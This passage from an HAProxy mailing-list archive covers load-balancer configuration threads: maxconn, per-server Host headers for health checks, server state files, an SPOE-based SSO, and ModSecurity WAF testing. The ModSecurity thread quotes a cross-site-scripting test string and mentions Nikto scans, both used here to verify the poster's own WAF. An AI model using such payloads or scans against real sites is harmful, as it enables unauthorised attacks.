> http-request deny deny_status 429 if rate_abuse
>
> backend nodes
> mode http
> balance roundrobin
> server echoprgm 10.37.9.30:11001 check
>
>
>
>
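For reference, the rates.map file referenced above maps path prefixes to
integer limits. The values are compared against http_req_rate(10s), so they
are counts per 10-second window; the entries below are illustrative:

```
# /etc/hapee-1.8/maps/rates.map
# path prefix   allowed requests per 10s window
/login          100
/api            1000
```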


Re: global maxconn behaviour in haproxy2.0

2019-06-25 Thread Igor Cicimov
Hi,

On Wed, Jun 26, 2019 at 2:52 AM William Dauchy  wrote:

> Hello,
>
> Using haproxy2.0 we are seeing logs with connection number while reloading:
> Proxy  stopped (FE: 0 conns, BE: 549563 conns).
>
> while we have in our configuration:
> global maxconn 262144
> defaults maxconn 262134
>
> I was wondering whether this could be considered as expected, to have a
> backend with more connections compared to the global parameter.
>
> Best,
> --
> William
>
>
Those maxconn values are per frontend, so if your backend is referenced by
two frontends you might end up with a limit of 2 x maxconn on the backend.
Hence it is recommended to set maxconn per server too, to protect from
situations like this. Read about maxconn, and also fullconn, in the server
configuration and tuning guide for more details.
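A sketch of the layered limits described above; all numbers are illustrative:

```
global
    maxconn 262144        # process-wide connection ceiling

defaults
    maxconn 262134        # applies per frontend

backend nodes
    fullconn 1000         # backend load at which per-server limits reach maxconn
    # per-server cap; excess connections queue up to maxqueue
    server app1 10.0.0.1:80 check maxconn 500 maxqueue 256
```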


Re: Proof of concept SPOE based SSO solution

2019-07-08 Thread Igor Cicimov
On Fri, Jul 5, 2019 at 11:12 AM Andrew Heberle 
wrote:

> Hi All,
>
> I have put together a Go based proof of concept SPOE agent that also
> implements a SAML 2 Service Provider (SP) in order to do "SSO" in
> HAProxy.
>
> The code is located here:
>
> https://gitlab.com/andrewheberle/go-http-auth-sso
>
> The basic process is that SPOA is used to check if the user is logged
> in or not and then based on the set variables you can make decisions
> via "http-request" rules.
>
> This originally started out without the SPOE part and was using the
> Lua http-auth-request script
> (https://github.com/TimWolla/haproxy-auth-request), however with the
> release of the Go SPOE package
> (https://github.com/Aestek/haproxy-connect/tree/master/spoe) I rewrote
> it based on that.
>
> Our use case is to have the SP pointed to a IdP in Azure so we can do
> single-sign-on to Office 365 and we have "http-request" rules in place
> to set some custom headers that our application uses for
> authentication/authorisation.  These are set based on the variables
> that come back from the SPOA, which come from the claims in the
> authentication process.
>
> Hopefully this is of some use to people.
>
> Any feedback and constructive criticism is welcome.
>
> --
> Andrew Heberle
>
>
Thanks for sharing Andrew!

Cheers,
Igor


The server-template and default-server options

2019-08-05 Thread Igor Cicimov
Hi all,

Just a quick one to confirm for sure: can/does server-template
consider/inherit the options from a default-server line?

Thanks,
Igor


Re: [PR/FEATURE] support for virtual hosts / Host header per server

2019-10-22 Thread Igor Cicimov
On Tue, Oct 22, 2019, 10:27 PM Morotti, Romain D <
romain.d.moro...@jpmorgan.com> wrote:

> Hello,
>
>
>
> The use case is to load balance applications in multiple datacenters or
> regions.
>
> The common pattern today to cover multiple locations is to deploy services
> in each location separately and independently.
>
>
>
> This happens with kubernetes for example, where a cluster is typically
> limited to a datacenter. Covering multiple locations is done by having
> independent clusters and provisioning the application to each of them.
>
> e.g. myapp.kube-naest1.example.com + myapp.kube-euwest.example.com.
>
>
>
> As a developer, I want to present the application on a single consistent
> URL with failover, e.g. myapp.example.com.
>
> Without getting into too much details, this is done with a layer of load
> balancing and this requires careful consideration around DNS, Host header,
> TLS SNI, certificates and healthcheck to work end-to-end.
>
>
>
> Let's take the two most basic use cases.
>
>
>
> # multi clusters use case
>
> backend foo
>
> mode http
>
> option httpchk GET /healthcheck
>
> http-send-name-header Host
>
> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>
> server myapp.kube-naest2.example.com myapp.kube-naest2.example.com:80
>
>
>
> # multi regions use case
>
> backend foo
>
> mode http
>
> option httpchk GET /healthcheck
>
> http-send-name-header Host
>
> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>
> server myapp.kube-euwest.example.com myapp.kube-euwest.example.com:80
>
>
>
> Each backend expects its own Host header, otherwise kubernetes cannot
> route and serve the request.
>
Can't you just set an Alias on your backend with all the expected domains
to serve for that vhost?

> In haproxy, this can be made to work using the "http-send-name-header
> Host" directive, that overrides the Host header per backend.
>
>
>
> This setup fails in practice because of the healthcheck failing. The
> healthcheck request sent by haproxy doesn't have a host header. It ignores
> the "http-send-name-header" directive and there is no option to set the
> healthcheck host per backend.
>
> (Similar challenge with TLS SNI, that is easily worked around by disabling
> TLS checks. There are settings "sni req.hdr(host)" and "check-sni" to
> adjust, with little information on all these settings combine).
>
>
>
> The proposed patch intended to add one setting per backend to manage the
> host header end-to-end consistently and reliably: adjusting healthchecks,
> forwarding requests and TLS domain.
>
>
>
> If you prefer not to do this, I can think of a less intrusive patch to
> configure the healthcheck.
>
> Since there is already the "http-send-name-header Host" directive, whose
> main use case is to adjust the Host header per backend.
>
> I could patch the healthcheck code to follow that directive when running
> https healthchecks, if that’s okay with you.
>
>
>
> Thinking of it, it could be considered a bug that the healthcheck doesn't
> do that already. If I configure all my servers to get a header, it’s
> certainly important and I expect the healthcheck to get it too.
>
>
>
> Related questions and issues:
>
>
> https://serverfault.com/questions/876871/configure-haproxy-to-include-host-headers-for-different-backends
>
>
> https://serverfault.com/questions/770737/making-haproxy-pass-a-host-name-in-httpcheck
>
>
> https://serverfault.com/questions/594669/haproxy-health-checking-multiple-servers-with-different-host-names
>
>
>
>
>
> Regards.
>
>
>
>
>
> *From:* Willy Tarreau [mailto:w...@1wt.eu]
> *Sent:* 03 October 2019 05:51
> *To:* Morotti, Romain D (CIB Tech, GBR) 
> *Cc:* haproxy@formilux.org; Sayar, Guy H (CIB Tech, GBR) <
> guy.h.sa...@jpmorgan.com>
> *Subject:* Re: [PR/FEATURE] support for virtual hosts / Host header per
> server
>
>
>
> Hello Romain,
>
> On Tue, Oct 01, 2019 at 12:08:03PM +, Morotti, Romain D wrote:
> > What is the status on this?
>
> Sorry, but it took some time to work on other priorities, and to be
> honest, the subject looked scary enough to deserve enough time to
> study it. Sadly, if I can say, the subject was pretty descriptive of
> what it does, and this is fundamentally wrong.
>
> So just to summarize for those who haven't had a look at the patch,
> what this patch does is to replace the host header in requests sent to
> a server with one specified for this server, resulting in each server
> within the same farm to run on a different vhost. This goes back to
> the errors that plagued many hosting infrastructures in the late 90s
> and early 2000s where redirects, hosts in pages etc were wrong because
> the application was called with an internal name instead of the correct
> one. Moreover this used to prevent servers from being shared between
> multiple hosts since the host header was containing rubish. For
> reference, Apache merged the ProxyPreserveHost in 2.0.31 in 2002 to put
> an end to th

Re: [PR/FEATURE] support for virtual hosts / Host header per server

2019-10-22 Thread Igor Cicimov
On Wed, Oct 23, 2019, 8:36 AM Igor Cicimov 
wrote:

>
>
> On Tue, Oct 22, 2019, 10:27 PM Morotti, Romain D <
> romain.d.moro...@jpmorgan.com> wrote:
>
>> Hello,
>>
>>
>>
>> The use case is to load balance applications in multiple datacenters or
>> regions.
>>
>> The common pattern today to cover multiple locations is to deploy
>> services in each location separately and independently.
>>
>>
>>
>> This happens with kubernetes for example, where a cluster is typically
>> limited to a datacenter. Covering multiple locations is done by having
>> independent clusters and provisioning the application to each of them.
>>
>> e.g. myapp.kube-naest1.example.com + myapp.kube-euwest.example.com.
>>
>>
>>
>> As a developer, I want to present the application on a single consistent
>> URL with failover, e.g. myapp.example.com.
>>
>> Without getting into too much details, this is done with a layer of load
>> balancing and this requires careful consideration around DNS, Host header,
>> TLS SNI, certificates and healthcheck to work end-to-end.
>>
>>
>>
>> Let's take the two most basic use cases.
>>
>>
>>
>> # multi clusters use case
>>
>> backend foo
>>
>> mode http
>>
>> option httpchk GET /healthcheck
>>
>> http-send-name-header Host
>>
>> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>>
>> server myapp.kube-naest2.example.com myapp.kube-naest2.example.com:80
>>
>>
>>
>> # multi regions use case
>>
>> backend foo
>>
>> mode http
>>
>> option httpchk GET /healthcheck
>>
>> http-send-name-header Host
>>
>> server myapp.kube-naest1.example.com myapp.kube-naest1.example.com:80
>>
>> server myapp.kube-euwest.example.com myapp.kube-euwest.example.com:80
>>
>>
>>
>> Each backend expects its own Host header, otherwise kubernetes cannot
>> route and serve the request.
>>
> Can't you just set an Alias on your backend with all the expected domains
> to serve for that vhost?
>

Sorry, I misread your issue. It is a strange setup you have there; I wonder why
you need cross-DC load balancing on the k8s ingress when you are already
doing it globally via DNS?

> In haproxy, this can be made to work using the "http-send-name-header
>> Host" directive, that overrides the Host header per backend.
>>
>>
>>
>> This setup fails in practice because of the healthcheck failing. The
>> healthcheck request sent by haproxy doesn't have a host header. It ignores
>> the "http-send-name-header" directive and there is no option to set the
>> healthcheck host per backend.
>>
>> (Similar challenge with TLS SNI, that is easily worked around by
>> disabling TLS checks. There are settings "sni req.hdr(host)" and
>> "check-sni" to adjust, with little information on all these settings
>> combine).
>>
>>
>>
>> The proposed patch intended to add one setting per backend to manage the
>> host header end-to-end consistently and reliably: adjusting healthchecks,
>> forwarding requests and TLS domain.
>>
>>
>>
>> If you prefer not to do this, I can think of a less intrusive patch to
>> configure the healthcheck.
>>
>> Since there is already the "http-send-name-header Host" directive, whose
>> main use case is to adjust the Host header per backend.
>>
>> I could patch the healthcheck code to follow that directive when running
>> https healthchecks, if that’s okay with you.
>>
>>
>>
>> Thinking of it, it could be considered a bug that the healthcheck doesn't
>> do that already. If I configure all my servers to get a header, it’s
>> certainly important and I expect the healthcheck to get it too.
>>
>>
>>
>> Related questions and issues:
>>
>>
>> https://serverfault.com/questions/876871/configure-haproxy-to-include-host-headers-for-different-backends
>>
>>
>> https://serverfault.com/questions/770737/making-haproxy-pass-a-host-name-in-httpcheck
>>
>>
>> https://serverfault.com/questions/594669/haproxy-health-checking-multiple-servers-with-different-host-names
>>
>>
>>
>>
>>
>> Regards.
>>
>>
>>
>>
>>
>> *From:* Willy Tarreau [mailto:w...@1wt.eu]
>> *Sent:* 03 October 2019 05:51
>> *To:* Morotti, Romain D (CIB Tech, GBR) 
>> *Cc:* 

Re: [PR/FEATURE] support for virtual hosts / Host header per server

2019-11-03 Thread Igor Cicimov
HI Willy,

On Thu, Oct 31, 2019 at 8:56 PM Willy Tarreau  wrote:
>
> Hi Romain,
>
> On Fri, Oct 25, 2019 at 12:55:31PM +, Morotti, Romain D wrote:
> > Hello,
> >
> > Patch attached. Adding an option "http-check send-name-header ".
> > It adds a header per server in healthchecks, similar usage to
> > "http-send-name-header". Built and tested locally.
>
> So I'm still not totally fond of it to be honest, at an era where
> people are using server-templates to dynamically populate their
> farms with fixed server names, and will instead replace the FQDN
> at run time when populating their farms but I do see at least
> some consistency in your use case.
>
> I thought we could start better with limited extra effort by adding
> one argument to the servers, that could later be changed from the
> CLI so that users can decide how they update their farms.
>
> Also for all those using DNS, it's actually the server's FQDN and not
> its internal config name which will be required to be sent. As such I
> still think that this feature as-is will quickly be deprecated and
> dropped in future releases by lack of relevant use case.
>
> If others think we should take this patch as a temporary step, I'm
> not fundamentally against it, I'm just seeing it as a temporary hack.
> In this case it will be desirable to write more than just a one-liner
> for the keyword documentation entry and explain what it really does
> so that it doesn't drive some users to wrong conclusions.
>
> What do others think ? Igor maybe you have a particular opinion on
> this one ? Baptiste, anything from the dynamic use cases you're aware
> of ?
>
> Thanks,
> Willy

As far as Kubernetes is concerned, the proper way to implement a cross-cluster
setup as in the OP's case is via Federation. I have never done it but, just from
looking at the docs, I can say for sure it is not an easy task to take on. Far
more complex than forging Host headers, I must say ;-).

Sorry I can't provide any useful input; as a humble user I usually go with
whatever the clever people of this great project come up with, and I'm sure it
will always be the right decision.

Regards,
Igor
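As a closing note for archive readers: later HAProxy releases (2.2+) added an
"http-check send" directive that lets a backend set the health-check method,
URI and Host header explicitly, which covers part of the use case discussed in
this thread. A sketch, with hostnames illustrative:

```
backend foo
    mode http
    option httpchk
    # 2.2+ syntax: set the request line and Host header used by health checks
    http-check send meth GET uri /healthcheck hdr Host myapp.example.com
    server dc1 myapp.kube-naest1.example.com:80 check
    server dc2 myapp.kube-euwest.example.com:80 check
```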



ModSecurity testing

2019-12-09 Thread Igor Cicimov
Hi all,

I have a quick question about running ModSecurity in Haproxy. I followed
the guide https://github.com/haproxy/haproxy/tree/master/contrib/modsecurity,
have compiled the modsecurity binary and have setup all required
configuration for Haproxy as per the guide.

I have ModSecurity running locally on port 12345:

$ modsecurity -d -n 1 -p 12345 -f /etc/modsecurity/modsecurity.conf -f
/etc/modsecurity/owasp-modsecurity-crs.conf
1575948204.684882 [00] ModSecurity for nginx (STABLE)/2.9.2
(http://www.modsecurity.org/) configured.
1575948204.684938 [00] ModSecurity: APR compiled version="1.7.0"; loaded
version="1.7.0"
1575948204.684949 [00] ModSecurity: PCRE compiled version="8.38 "; loaded
version="8.38 2015-11-23"
1575948204.685084 [00] ModSecurity: YAJL compiled version="2.1.0"
1575948204.685096 [00] ModSecurity: LIBXML compiled version="2.9.3"
1575948204.685103 [00] ModSecurity: Status engine is currently disabled,
enable it by set SecStatusEngine to On.
1575948204.701154 [00] Worker 01 initialized

and can see Haproxy connecting to the service in its own logs and
ModSecurity output:

Available filters :
[SPOE] spoe
[COMP] compression
[TRACE] trace
Using epoll() as the polling mechanism.
localhost haproxy[518]: Proxy my-front started.
localhost haproxy[518]: Proxy my-front started.
localhost haproxy[518]: Proxy spoe-modsecurity started.

The Haproxy config is quite simple as per the guide:

listen my-front
timeout client 5s
timeout connect 5s
timeout server 5s
mode http
bind :9080
log-format "The txn.modsec.code is: %[var(txn.modsec.code)]"
filter spoe engine modsecurity config /etc/haproxy/spoe-modsecurity.conf
http-request deny if { var(txn.modsec.code) -m int gt 0 }
server local 127.0.0.1:8080

backend spoe-modsecurity
mode tcp
timeout connect 5s
timeout server  3m
server iprep1 127.0.0.1:12345

As you can see I have the OWASP rules setup under /etc/modsecurity/ and the
SecRuleEngine is enabled:

$ grep SecRuleEngine /etc/modsecurity/modsecurity.conf
SecRuleEngine On

and the rules loaded (I guess):

$ cat /etc/modsecurity/owasp-modsecurity-crs.conf
Include /etc/modsecurity/owasp-modsecurity-crs/crs-setup.conf
Include
/etc/modsecurity/owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf
[...]

and SecDefaultAction set to 403:

$ grep DefaultAction /etc/modsecurity/owasp-modsecurity-crs/crs-setup.conf
| grep -v "^#" | grep .
SecDefaultAction "phase:1,log,auditlog,deny,status:403"
SecDefaultAction "phase:2,log,auditlog,deny,status:403"

However, for the life of me I can not make any successful test and get 403
error from Haproxy when sending test load (as per the guide). For the
example query mentioned there, ?param="><script>alert(1);</script>, Haproxy
replies with 400 instead of 403. I have also tried running Nikto2 scanner
that should for sure be detected by the scanner rules but all I get is
negative value or not value at all for the txn.modsec.code variable return
by ModSecurity:

haproxy[32752]: The txn.modsec.code is: -101
haproxy[32752]: The txn.modsec.code is: -
haproxy[32752]: The txn.modsec.code is: -101
haproxy[32752]: message repeated 1408 times: [ The txn.modsec.code is: -101]
haproxy[32752]: The txn.modsec.code is: -
haproxy[32752]: The txn.modsec.code is: -101

The ModSecurity output during the test:

1575948214.855512 [00] <1> New Client connection accepted and assigned to
worker 01
1575948214.855689 [01] <1> read_frame_cb
1575948214.855767 [01] <1> New Frame of 129 bytes received
1575948214.855787 [01] <1> Decode HAProxy HELLO frame
1575948214.855804 [01] <1> Supported versions : 2.0
1575948214.855819 [01] <1> HAProxy maximum frame size : 16380
1575948214.855836 [01] <1> HAProxy capabilities : pipelining,async
1575948214.855855 [01] <1> HAProxy supports frame pipelining
1575948214.855872 [01] <1> HAProxy supports asynchronous frame
1575948214.855888 [01] <1> HAProxy engine id :
c2accfac-1da0-4593-81c5-1ad2749be68b
1575948214.855908 [01] <1> Encode Agent HELLO frame
1575948214.855926 [01] <1> Agent version : 2.0
1575948214.855943 [01] <1> Agent maximum frame size : 16380
1575948214.855958 [01] <1> Agent capabilities :
1575948214.855994 [01] <1> write_frame_cb
1575948214.856472 [01] <1> Frame of 54 bytes send
1575948214.856521 [01] <1> read_frame_cb
1575948214.856546 [01] <1> New Frame of 196 bytes received
1575948214.856562 [01] <1> Decode HAProxy NOTIFY frame
1575948214.856578 [01] <1> STREAM-ID=2232 - FRAME-ID=1 - unfragmented frame
received - frag_len=0 - len=196 - offset=8
1575948214.856606 [01] Process frame messages : STREAM-ID=2232 - FRAME-ID=1
- length=188 bytes
1575948214.856623 [01] Process SPOE Message 'check-request'
1575948214.857123 [01] Encode Agent ACK frame
1575948214.857154 [01] STREAM-ID=2232 - FRAME-ID=1
1575948214.857169 [01] Add action : set variable code=4294967195
1575948214.857219 [01] <1> write_frame_cb
1575948214.857648 [01] <1> Frame of 31 bytes send

Testing with Haproxy 2.0.10 but same result with 1.8.23

Re: PROXY protocol and check port

2019-12-16 Thread Igor Cicimov
Hi,

On Tue, Dec 17, 2019 at 2:55 AM Olivier D  wrote:

> Hello,
>
> I found what was wrong : I was using "load-server-state-from-file" and
> previous config file was using port 80 as server port.
> It seems using this instruction loads previous server state but also
> previous srv_port.
> Is this an expected behaviour ?
>

Yes, basically it is your responsibility to dump the current state into the
file, otherwise you'll get outdated data as you noticed. For example I add:

ExecReload=/bin/echo "show servers state" | /usr/bin/socat stdio
/run/haproxy/admin.sock > /var/lib/haproxy/state

in the systemd service file.
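Spelled out, the unit override Igor describes might look like the drop-in
below. The paths and the use of "/bin/sh -c" for the pipe are illustrative
assumptions, not a verified setup:

```
# /etc/systemd/system/haproxy.service.d/state-dump.conf (illustrative path)
[Service]
# First clear the packaged ExecReload, then dump the live server state to
# the file named by server-state-file before the reload happens.
ExecReload=
ExecReload=/bin/sh -c 'echo "show servers state" | socat stdio /run/haproxy/admin.sock > /var/lib/haproxy/state'
ExecReload=/bin/kill -USR2 $MAINPID
```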


Re: ModSecurity testing

2019-12-16 Thread Igor Cicimov
Hi Joao,

On Sat, Dec 14, 2019 at 11:30 PM Joao Morais  wrote:

>
>
> > Em 13 de dez de 2019, à(s) 10:09, Christopher Faulet <
> cfau...@haproxy.com> escreveu:
> >
> > On 10/12/2019 at 05:24, Igor Cicimov wrote:
> >>
> >> Testing with Haproxy 2.0.10 but same result with 1.8.23. The versions
> of ModSecurity is 2.9.2 and the OWASP rules v3.0.2
> >> What am I doing wrong? Can anyone provide a request that should confirm
> if the module is working or not from or share the experience from their own
> setup?
> >
> > Hi Igor,
> >
> > First of all, I don't know how the modsecurity agent really work. But
> I'm surprised to see it returns -101. In the code, -1, 0 or an HTTP status
> code is expected. And only 0 or the HTTP status code is returned to
> HAProxy. I don't know if -101 is a valid return value from modsecurity
> point of view. But it is not from the agent one.
> >
> > Then, You don't have an error 403 because the variable txn.modsec.code
> is negative, so the deny http-request rule is never triggered. So, I guess
> your error 400 comes from your webserver. You can enabled HTTP log to have
> more information.
> >
> > Finally, I notice some requests to the SPOA agent seems to have failed.
> The variable is not set (- in the logs). You can try to enable SPOE logs in
> your SPOE engine configuration. Take a look at the SPOE documentation
> (doc/SPOE.txt) for more information.
>
>
> Hi, perhaps this thread helps:
>
> https://www.mail-archive.com/haproxy@formilux.org/msg30061.html
>
> And perhaps this building of ModSecurity SPOA will also help:
>
>
> https://github.com/jcmoraisjr/modsecurity-spoa/blob/v0.5/rootfs/Dockerfile
>
> ~jm
>

First thanks for your reply, I've been following your work on
haproxy-ingress for Kubernetes (where I can see you have incorporated
ModSecurity) and your input is certainly appreciated on this matter.

I had some time today to quickly run the test again after enabling the log
for SPOE:

[modsecurity]
spoe-agent modsecurity-agent
log global
messages check-request
option  var-prefix  modsec
option  continue-on-error
timeout hello   100ms
timeout idle30s
timeout processing  1s
use-backend spoe-modsecurity

spoe-message check-request
args unique-id method path query req.ver req.hdrs_bin req.body_size
req.body
event on-frontend-http-request

and I can see that the empty values coming from SPOE are legitimate: they are
caused by the SEARCH method, which HAProxy does not allow:

Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.accept(000a)=0016 from [127.0.0.1:53206] ALPN=
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clireq[0016:]: SEARCH / HTTP/1.1
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: user-agent: Mozilla/5.0 (Windows
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/74.0.3729.169 Safari/537.36
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: content-type:
application/x-www-form-urlencoded
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: content-length: 1
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clihdr[0016:]: host: localhost:9080
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1343:my-front.srvcls[0017:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1343:my-front.clicls[0017:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1343:my-front.closed[0017:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvrep[0016:0013]: HTTP/1.1 405 Method Not Allowed
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: SPOE: [modsecurity-agent]
 sid=4933 st=0 0/0/0/0/0 4/4 0/0 0/2768
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: The txn.modsec.code is: -
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvhdr[0016:0013]: server: ecstatic-3.3.2
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: The txn.modsec.code is: -
Dec 17 00:40:01 ip-172-31-17-121 haproxy[21508]: SPOE: [modsecurity-agent]
 sid=4935 st=0 0/0/0/0/0 4/4 0/0 0/2769
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvhdr[0016:0013]: date: Tue, 17 Dec 2019 00:40:01 GMT
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvhdr[0016:0013]: content-length: 0
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.srvcls[0016:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.clicls[0016:0013]
Dec 17 00:40:01 ip-172-31-17-121 haproxy[17468]:
1345:my-front.closed[0016:0013]

and some other methods like TRACK, PROPFIND and DEBUG that Nikto tries out.

Apart from that, I'm still equally stumped as I
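For reference, the spoe-agent section quoted above only defines the SPOE side of the setup; a minimal sketch of how it is typically wired into the proxy (frontend/backend names, bind port, agent address and the deny threshold are assumptions based on the usual modsecurity SPOA examples, not taken from my actual config):

```
frontend my-front
    bind *:9080
    mode http
    filter spoe engine modsecurity config /etc/haproxy/spoe-modsecurity.conf
    http-request deny if { var(txn.modsec.code) -m int gt 0 }
    default_backend my-servers

backend spoe-modsecurity
    mode tcp
    server modsec-spoa1 127.0.0.1:12345
```

The deny rule never fires when txn.modsec.code is unset or negative, which matches the behaviour Christopher described.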

Re: PROXY protocol and check port

2019-12-17 Thread Igor Cicimov
Hi Olivier,

On Tue, Dec 17, 2019 at 7:20 PM Olivier D  wrote:

> Hello Igor,
>
>
> Le lun. 16 déc. 2019 à 23:41, Igor Cicimov 
> a écrit :
>
>> Hi,
>>
>> On Tue, Dec 17, 2019 at 2:55 AM Olivier D  wrote:
>>
>>> Hello,
>>>
>>> I found what was wrong : I was using "load-server-state-from-file" and
>>> previous config file was using port 80 as server port.
>>> It seems using this instruction loads previous server state but also
>>> previous srv_port.
>>> Is this an expected behaviour ?
>>>
>>
>> Yes, basically it is your responsibility to dump the current state into
>> the file otherwise you'll get outdated data as you noticed. For example I
>> add:
>>
>> ExecReload=/bin/echo "show servers state" | /usr/bin/socat stdio
>> /run/haproxy/admin.sock > /var/lib/haproxy/state
>>
>> in the systemd service file.
>>
>
> That's not what I was saying. I'm already using "show servers state", and
> that's exactly what led me to hours of debugging: between two versions of
> my haproxy config file, I changed the backend server port from 80 to 443.
> When HAProxy reloaded, it loaded the server state file and restored both
> the previous up/down state of the server and the server port. That's why
> HAProxy never used port 443 as the backend port and was still using the old
> port 80.
>

Ah, I get you. I haven't hit a case like that yet, but it is strange.
Probably best to wait for someone with knowledge of the code to answer your
question :-/

> This is not clearly stated in the configuration documentation (or maybe I
> missed it?), that's why I was asking whether it is expected behaviour. In
> my mind, the server state file was only used to carry the server status
> between two reloads, nothing more.
>
> Olivier
>
>


Termination state IR--

2020-01-28 Thread Igor Cicimov
Hi all,

I'm asking this question here since I read in the docs that if I see "Ixxx"
in the session "termination_state" log I should do so :-)

The error I got while experimenting with the HAP config is as follows:

Jan 29 03:33:44 ip-172-31-45-201 haproxy[124024]: :44296
[29/Jan/2020:03:33:44.952] fe_https~ host.mydomain.com/
-1/-1/-1/-1/0 500 0 - - IR-- 1/1/5/0/3 0/0 "GET /api/search HTTP/1.1"

The command that produced it:

$ curl -vsSNiL -H "Host: host.mydomain.com"
https://haproxy.example.com:8443/api/search

And the relevant haproxy-2.0.12 configuration (it's in AWS):

resolvers vpc
nameserver dns1 172.31.0.2:53
accepted_payload_size 8192
resolve_retries   30
timeout resolve   1s
timeout retry 2s
hold valid30s
hold other30s
hold refused  30s
hold nx   30s
hold timeout  30s
hold obsolete 30s

frontend fe_https
bind *:8443 ssl crt /etc/haproxy/ssl.d/ alpn h2,http/1.1
mode http
option httplog
use_backend %[req.hdr(host),word(1,:),lower]

backend host.mydomain.com
mode tcp
option tcp-check
tcp-check connect port 443 ssl
balance source
default-server inter 60s downinter 30s rise 2 fall 2 slowstart 10s
weight 100 ca-file /etc/ssl/certs/ca-certificates.crt on-marked-down
shutdown-sessions
server myhost host.mydomain.com:443 verify none check resolvers vpc
resolve-prefer ipv4
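As an aside, the dynamic use_backend rule in the frontend derives the backend name from the Host header. A rough Python model of what the fetch/converter chain `%[req.hdr(host),word(1,:),lower]` evaluates to (the `word` helper below only approximates HAProxy's converter semantics and is hypothetical):

```python
def word(value: str, n: int, sep: str) -> str:
    """Rough model of HAProxy's word() converter: n-th non-empty field."""
    parts = [p for p in value.split(sep) if p]
    return parts[n - 1] if 0 < n <= len(parts) else ""

def backend_name(host_header: str) -> str:
    # %[req.hdr(host),word(1,:),lower] -> strip any :port, then lowercase
    return word(host_header, 1, ":").lower()

print(backend_name("Host.MyDomain.com:8443"))  # host.mydomain.com
```

So a request carrying "Host: host.mydomain.com" selects the backend named host.mydomain.com, as intended; the IR-- state therefore points at what happens after backend selection rather than at the name mapping itself.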

Haproxy version dump:

# haproxy -vv
HA-Proxy version 2.0.12-1ppa~xenial 2019/12/21 - https://haproxy.org/
Build options :
  TARGET  = linux-glibc
  CPU = generic
  CC  = gcc
  CFLAGS  = -O2 -g -O2 -fPIE -fstack-protector-strong -Wformat
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2
-fno-strict-aliasing -Wdeclaration-after-statement -fwrapv
-Wno-unused-label -Wno-sign-compare -Wno-unused-parameter
-Wno-old-style-declaration -Wno-ignored-qualifiers -Wno-clobbered
-Wno-missing-field-initializers -Wtype-limits
  OPTIONS = USE_PCRE2=1 USE_PCRE2_JIT=1 USE_REGPARM=1 USE_OPENSSL=1
USE_LUA=1 USE_ZLIB=1 USE_SYSTEMD=1

Feature list : +EPOLL -KQUEUE -MY_EPOLL -MY_SPLICE +NETFILTER -PCRE
-PCRE_JIT +PCRE2 +PCRE2_JIT +POLL -PRIVATE_CACHE +THREAD -PTHREAD_PSHARED
+REGPARM -STATIC_PCRE -STATIC_PCRE2 +TPROXY +LINUX_TPROXY +LINUX_SPLICE
+LIBCRYPT +CRYPT_H -VSYSCALL +GETADDRINFO +OPENSSL +LUA +FUTEX +ACCEPT4
-MY_ACCEPT4 +ZLIB -SLZ +CPU_AFFINITY +TFO +NS +DL +RT -DEVICEATLAS
-51DEGREES -WURFL +SYSTEMD -OBSOLETE_LINKER +PRCTL +THREAD_DUMP -EVPORTS

Default settings :
  bufsize = 16384, maxrewrite = 1024, maxpollevents = 200

Built with multi-threading support (MAX_THREADS=64, default=1).
Built with OpenSSL version : OpenSSL 1.0.2g  1 Mar 2016
Running on OpenSSL version : OpenSSL 1.0.2g  1 Mar 2016
OpenSSL library supports TLS extensions : yes
OpenSSL library supports SNI : yes
OpenSSL library supports : TLSv1.0 TLSv1.1 TLSv1.2
Built with Lua version : Lua 5.3.1
Built with network namespace support.
Built with transparent proxy support using: IP_TRANSPARENT IPV6_TRANSPARENT
IP_FREEBIND
Built with zlib version : 1.2.8
Running on zlib version : 1.2.8
Compression algorithms supported : identity("identity"),
deflate("deflate"), raw-deflate("deflate"), gzip("gzip")
Built with PCRE2 version : 10.21 2016-01-12
PCRE2 library supports JIT : yes
Encrypted password support via crypt(3): yes
Built with the Prometheus exporter as a service

Available polling systems :
  epoll : pref=300,  test result OK
   poll : pref=200,  test result OK
 select : pref=150,  test result OK
Total: 3 (3 usable), will use epoll.

Available multiplexer protocols :
(protocols marked as <default> cannot be specified using 'proto' keyword)
  h2 : mode=HTXside=FE|BE mux=H2
  h2 : mode=HTTP   side=FEmux=H2
  <default> : mode=HTXside=FE|BE mux=H1
  <default> : mode=TCP|HTTP   side=FE|BE mux=PASS

Available services :
prometheus-exporter

Available filters :
[SPOE] spoe
[COMP] compression
[CACHE] cache
[TRACE] trace

I'm sure I've done something wrong, since I have exactly the same backend
working fine with a frontend in TCP mode using "req.ssl_sni", like so:

frontend fe_https_tcp
bind *:8443
mode tcp
option tcplog
tcp-request connection reject if !{ src -f /etc/haproxy/whitelist.lst }
tcp-request inspect-delay 5s
